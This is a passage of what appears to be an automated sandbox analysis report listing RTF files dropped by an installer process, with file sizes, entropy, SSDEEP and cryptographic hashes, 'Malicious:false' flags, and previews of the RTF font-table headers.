                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset162\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f39\fbidi \fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Ro
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45843
                                                                                                                                                                                                                                                          Entropy (8bit):5.099884587726615
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:XFRfvKmGHTwjjJ6jNBmuIV3brtE/TnFkUpv0jxZGcAK0njUZXZo7IJJY:XHCMHJ2
                                                                                                                                                                                                                                                          MD5:FE6B9C7CF4F0B6627DEB585E904CDBEB
                                                                                                                                                                                                                                                          SHA1:552B91CE134693F121234EB5E3CA538C60449B7A
                                                                                                                                                                                                                                                          SHA-256:74FDB6A5CAB4DAF2D175C831124D75631EBD1247BF1C09F43BA8CDA3B4241B56
                                                                                                                                                                                                                                                          SHA-512:ABE4C5B9A2B1F074A4D9A470AE2173282DFCDE63382CCC7311DF3822698CDB4A7F02B98D85AAF3DFFBC0E97F734E026D5F97438858AB5BC76821F4CD8D2D22E5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1049\deflangfe1049\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f030202
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50542
                                                                                                                                                                                                                                                          Entropy (8bit):5.082123818083202
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:0LMrbAKeJcmz0s4ieSRukoMV8SLpmo8uSYSyWBKnObct3/nf4qY3BtHn+/z3Ogwa:08A7YM3OgwXG6I5
                                                                                                                                                                                                                                                          MD5:8375A1338E343C284BB1EA8461B16EF5
                                                                                                                                                                                                                                                          SHA1:5329FB0F5AFB566177F45FE49A7FF0411571CB6C
                                                                                                                                                                                                                                                          SHA-256:6024A7AA29911E5D8670FC1028749D736D95115AA89E07DC00C823E68101B032
                                                                                                                                                                                                                                                          SHA-512:98D1213836A17D44072B11488BF9FB5DF408A3B7E1D0EED7CAE13C3C6DDEF09EE52C613C20C7277410BAFD57644A88B4EF9286B9BB5D31C79DB6E9D30F4317AF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42288
                                                                                                                                                                                                                                                          Entropy (8bit):5.108390882492053
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:TLMrUuh04mIYKRXOYIX6tS+zdGA+ElGj/zdUIpeabvJ:T9B3dUIpeabvJ
                                                                                                                                                                                                                                                          MD5:97897027B8B5FE133581EA13A6EE7976
                                                                                                                                                                                                                                                          SHA1:614F116D74418D950D6E6D0989BF7249ED77721B
                                                                                                                                                                                                                                                          SHA-256:4E4734B0CE3DCFBAF08B4EBE18926E6AE6E63A50F0C4CB6D47452EACF9253F2D
                                                                                                                                                                                                                                                          SHA-512:00755B8B03BC8A83B36103E79C7FF62BA50816C4669A8CBBFADC4CD52E31037BE1ECD3CA93EC1A3B5D28363F54E49E3C91F461D6BB7664FA7D7327BEE75B9780
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset162\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f030202
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43858
                                                                                                                                                                                                                                                          Entropy (8bit):5.1066210164319585
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:TLmrs4sw9FmdVFroAWBmho4cnTseR4Jv6YfpgC/z3OgwXG6I7:TL4w3OgwXG6I7
                                                                                                                                                                                                                                                          MD5:47A87D6CE96B1DCA2C609A778373485D
                                                                                                                                                                                                                                                          SHA1:15823BE17A06C6C57EBAF6D0E55F56EBF0EFE98F
                                                                                                                                                                                                                                                          SHA-256:9276B70DE54E2675E72A84AE277563D4518A0DC56565379378A7CC3B10488697
                                                                                                                                                                                                                                                          SHA-512:D717567ED8C4A25270312E31F2481241A9B164B8A04D19C68A1BF3F9BD8890F99C3A0F4A76AFD6A4A24208F1BE16D9F10FCEEB36099828FCD3F35AC8E92C498E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset162\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f39\fbidi \fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Ro
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41746
                                                                                                                                                                                                                                                          Entropy (8bit):5.1082830705303195
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:TLmrs4sAvnoBVFroAWBmho4cnTseRnomp/z3OgwXG6Ik:TL433OgwXG6Ik
                                                                                                                                                                                                                                                          MD5:66827CCAAE125825B1E69A77C2F3C184
                                                                                                                                                                                                                                                          SHA1:AF5BE3BBE593D4327EA77157EE4780A185C50710
                                                                                                                                                                                                                                                          SHA-256:6444F8ADA3675836844F7320C0F588572EE3D7C890A4DD5E8132CB17DC7FCBAA
                                                                                                                                                                                                                                                          SHA-512:526058E0E367398C4E3295DA8B0F07118A1DF628DE4CBEDE276516E1FB045A33B2757768AE3713833F24A23E49667BC33BA43679844B0E68A9843CE390416984
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset162\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f39\fbidi \fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Ro
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):56877
                                                                                                                                                                                                                                                          Entropy (8bit):5.08048638360949
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:XFRf9q5GHTwjjJ6jNBmuIV3brtE/TnFkUpvMT1u55U4hU8Gs2PsYyCGsDt/8pA1T:XV/wT1QgfTHJ3
                                                                                                                                                                                                                                                          MD5:300A9C30F7C747136B0481B5765852E8
                                                                                                                                                                                                                                                          SHA1:A7DFA3454EDA5842B17AC27684B359EFBE68DF52
                                                                                                                                                                                                                                                          SHA-256:878EFDAD351F09C39DE3B711B25265E029847775500FE0C407D87898BD270158
                                                                                                                                                                                                                                                          SHA-512:9B989F4C7A3983F869C3F4FA694FF0B27661C4A88853684D84531ED12B317EE3172C1D9E0A100FBD6413ABE97FE50F6DB71A8DC3BF27F3716476830EC76683BC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1049\deflangfe1049\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f030202
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42485
                                                                                                                                                                                                                                                          Entropy (8bit):5.10644966338614
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:TLmrs4sAvnoBVFroAWBmho4cnTseR6NnE0/z3OgwXG6Iq:TL423OgwXG6Iq
                                                                                                                                                                                                                                                          MD5:2F22B5B2B29308EFA8F83A2A7756F134
                                                                                                                                                                                                                                                          SHA1:5AA36D0592B3A10518F28AFA7C65D338FD29B64E
                                                                                                                                                                                                                                                          SHA-256:F19658BABB054B874513345E81C3F3294FABF41C2F1A35B245510E307F782A5C
                                                                                                                                                                                                                                                          SHA-512:34902F5B360C5DA92E49B7C22D18250D504CF3186F229FADE902AFE617B3B13D47D0E8CB11B2423F8A1DA487B1140D96DCCB22613EE16D3ACB9BFB5DD72F1071
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset162\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f39\fbidi \fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Ro
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41048
                                                                                                                                                                                                                                                          Entropy (8bit):5.100342903202798
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:XFRfQuekVh+DiDhZ6jN3muIV3brtEeLUsQZZ6jNS23FmsZo7I1Jj:XYz0CyH1V
                                                                                                                                                                                                                                                          MD5:830A25F0F0DD4201CEDCE5A71290F52B
                                                                                                                                                                                                                                                          SHA1:7E8035CB05D3883857F729AD02FC772425DE859E
                                                                                                                                                                                                                                                          SHA-256:02A019309A83F3E82D5231C7E1861F7A54FFDF8C55C0357DC8335E56D89A8806
                                                                                                                                                                                                                                                          SHA-512:5F25190BE2A3C305113595C9517DC4CBDB7D6D6DE35B514C1E6F15AEC3BEDA831F6A600D5876262D93B93A40245A1599D0BFA5CAA37F94937C30E6B4ECB52EF5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1049\deflangfe1049\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f030202
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42048
                                                                                                                                                                                                                                                          Entropy (8bit):5.112920780203348
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:TLyrsEue7ccoHUVQtqpBMV8SLpmo+6Xl5m/z3OgwXG6Ie:THEr3OgwXG6Ie
                                                                                                                                                                                                                                                          MD5:FEC5348E8803947C2A90184FABCDCF6B
                                                                                                                                                                                                                                                          SHA1:2D43C953E0DF8C80BAE2FE19792A1A0E1CDD33A5
                                                                                                                                                                                                                                                          SHA-256:EB1C7F1EA6A62EC39DE6528B68F112EDB8E137106627A706DAC5F5E73EF4B785
                                                                                                                                                                                                                                                          SHA-512:435FD2FCB064017FB68BEE751B1DCABB134867B8E27312D25589B10C87EDC68D74F52EDE56039A1E0395CEF9568DC72AA223B9EAAFA3AF09A079F9AB1C29A4D8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset162\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f41\fbidi \fswiss\fcharset162\fprq2 Arial CYR;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37709
                                                                                                                                                                                                                                                          Entropy (8bit):5.097982097595037
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:0LMrCVmd0XKvpXnKnfmuh4jc0IXjFkjWrjfjOjWj3Q1/i6rGsqFwhR/MizFZKeBt:0LMrHuh4puRkAzKqLQ1l/zdUIpeabvr
                                                                                                                                                                                                                                                          MD5:B6940DC6E8FD337224A965573CCC6C96
                                                                                                                                                                                                                                                          SHA1:07F590E24341EA99AD71840F0ACE09FE7BDFD3D3
                                                                                                                                                                                                                                                          SHA-256:D6B44A01370E7516DE60CB797FB79D01BFD0A1734FA8EF227B7537A7676C29AE
                                                                                                                                                                                                                                                          SHA-512:CD3BC33236797086019006FFB4CFE5DDD3F796A1966A008832DDE0EC10DB6082D3ACAA2EFE5487EC419B89BA9A39B2B96309C639A4F3EA0F22FD505F4417A9D5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37812
                                                                                                                                                                                                                                                          Entropy (8bit):5.098588085153387
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:0LMrbpuhyiJXQIfR8+mo2VB/zdUIpeabva:08py5WdUIpeabva
                                                                                                                                                                                                                                                          MD5:32604687CD540ED2D4E66FEE8FB4A125
                                                                                                                                                                                                                                                          SHA1:29FE76F14A1D21DF0E2AF0DF2C84255E734C020D
                                                                                                                                                                                                                                                          SHA-256:8EAD5B5379FB2F98AFF59D49A2BD8224A93702CACA0DE228A65449A91DFD87DC
                                                                                                                                                                                                                                                          SHA-512:1C1B8F794DDB946B983A3193B5FD7DAC373EEE11CB5BA27FE8B0723B00C230971E6C722EBA5C52CAD1234AF41DD98FCFD0AAFBE1F44F474EFCDD59DCA3BBBC49
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42048
                                                                                                                                                                                                                                                          Entropy (8bit):5.112920780203348
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:TLyrsEue7ccoHUVQtqpBMV8SLpmo+6Xl5m/z3OgwXG6Ie:THEr3OgwXG6Ie
                                                                                                                                                                                                                                                          MD5:FEC5348E8803947C2A90184FABCDCF6B
                                                                                                                                                                                                                                                          SHA1:2D43C953E0DF8C80BAE2FE19792A1A0E1CDD33A5
                                                                                                                                                                                                                                                          SHA-256:EB1C7F1EA6A62EC39DE6528B68F112EDB8E137106627A706DAC5F5E73EF4B785
                                                                                                                                                                                                                                                          SHA-512:435FD2FCB064017FB68BEE751B1DCABB134867B8E27312D25589B10C87EDC68D74F52EDE56039A1E0395CEF9568DC72AA223B9EAAFA3AF09A079F9AB1C29A4D8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
